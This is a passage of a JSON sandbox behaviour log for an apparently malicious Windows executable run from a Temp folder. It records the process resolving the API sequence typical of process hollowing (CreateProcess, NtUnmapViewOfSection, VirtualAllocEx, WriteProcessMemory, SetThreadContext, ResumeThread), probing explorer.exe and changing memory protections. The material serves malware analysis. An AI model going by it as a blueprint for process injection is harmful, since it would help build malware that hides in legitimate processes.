{ "name": "FunctionName", "value": "Module32Next" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758bcd70" } ], "repeated": 0, "id": 212 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078fc", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 213 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004078ff", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 214 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407913", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 215 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407916", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 216 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407927", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 217 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040792a", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtUnmapViewOfSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c3480" } ], "repeated": 0, "id": 218 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040793e", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 219 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407941", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAllocEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897390" } ], "repeated": 0, "id": 220 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407955", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 221 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407958", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteProcessMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758975e0" } ], "repeated": 0, "id": 222 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040796c", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 223 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040796f", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895c70" } ], "repeated": 0, "id": 224 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407983", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 225 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407986", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetThreadContext" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758970c0" } ], "repeated": 0, "id": 226 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407994", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 227 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407997", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ResumeThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881b90" } ], "repeated": 0, "id": 228 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004079ab", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 229 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004079ae", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SuspendThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897230" } ], "repeated": 0, "id": 230 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004079c2", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 231 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004079c5", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "TerminateProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75879910" } ], "repeated": 0, "id": 232 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004079d9", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 233 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004079dc", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 234 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004079f3", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 235 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004079f6", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtReadVirtualMemory" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c35d0" } ], "repeated": 0, "id": 236 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a0a", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 237 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a0d", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "IsWow64Process" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880980" } ], "repeated": 0, "id": 238 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a21", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 239 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a24", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758808d0" } ], "repeated": 0, "id": 240 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a32", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 241 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a35", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DuplicateHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883160" } ], "repeated": 0, "id": 242 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a45", "parentcaller": "0x0040a2a7", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\psapi" }, { "name": "DllBase", "value": "0x76280000" } ], "repeated": 0, "id": 243 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a45", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "psapi.dll" }, { "name": "BaseAddress", "value": "0x76280000" } ], "repeated": 0, "id": 244 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a48", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "psapi.dll" }, { "name": "ModuleHandle", "value": "0x76280000" }, { "name": "FunctionName", "value": "GetProcessMemoryInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76281480" } ], "repeated": 0, "id": 245 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a58", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 246 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a5b", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCommandLineW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882010" } ], "repeated": 0, "id": 247 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a6e", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 248 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407a71", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883820" } ], "repeated": 0, "id": 249 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00408fbe", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\myapp.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 250 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00408fe0", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000033", "pretty_return": "OBJECT_NAME_INVALID", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00100080", "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\explorer.exe\\" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "2", "pretty_value": "FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 251 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409032", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 252 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040903b", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000280" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "FileInformationClass", "value": "5", "pretty_value": "FileStandardInformation" }, { "name": "FileInformation", "value": "\\x00\\x10.\\x00\\x00\\x00\\x00\\x00F\\x03.\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 253 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00409070", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.ex_" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 254 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "windows.storage.dll" } ], "repeated": 0, "id": 255 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\windows.storage.dll" } ], "repeated": 0, "id": 256 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000284" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\windows.storage.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 257 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000284" } ], "repeated": 0, "id": 258 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000288" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743e0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00618000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 259 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00002000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 260 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 261 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 262 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7498a000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 263 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "Wldp.dll" } ], "repeated": 0, "id": 264 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 265 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000284" } ], "repeated": 0, "id": 266 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\Wldp.dll" } ], "repeated": 0, "id": 267 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\wldp.dll" } ], "repeated": 0, "id": 268 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000284" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\wldp.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 269 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000284" } ], "repeated": 0, "id": 270 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000288" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743b0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00025000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 271 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x743d0000" }, { "name": "ModuleName", "value": "Wldp.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 272 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040a2a7", "parentcaller": "0x00405871", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { 